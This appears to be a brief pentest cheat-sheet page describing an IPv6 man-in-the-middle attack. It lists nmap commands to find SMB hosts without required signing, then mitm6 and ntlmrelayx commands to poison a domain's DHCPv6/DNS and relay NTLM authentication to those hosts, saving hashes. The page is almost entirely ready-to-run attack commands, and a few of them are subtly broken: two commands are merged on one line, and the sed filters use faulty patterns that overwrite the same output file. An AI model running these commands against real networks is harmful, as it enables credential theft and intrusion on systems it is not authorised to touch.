IPV6 With MITM6

First create a target list of hosts with SMB open:

nmap -p445 -sS -iL live_ips.txt -oA 445_scan cat 445_scan.gnmap | grep open | cut -d' ' -f2 > open_445.txt

Then find hosts with SMB signing disabled or not required:

nmap -n --script smb-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -n '/^Nmap/h;/disabled|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt 
nmap -n --script smb2-security-mode.nse -p445 -iL open_445.txt -oA smb_script 
sed -n '/^Nmap/h;/not required|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt

Finally relay poisoned sessions to the target list:

mitm6 -d domain.com -hb HVAC 
ntlmrelayx.py -tf smb_disabled.txt -socks -smb2support -6 -wh whitelist.domain.com -of hashes2

Last updated

Was this helpful?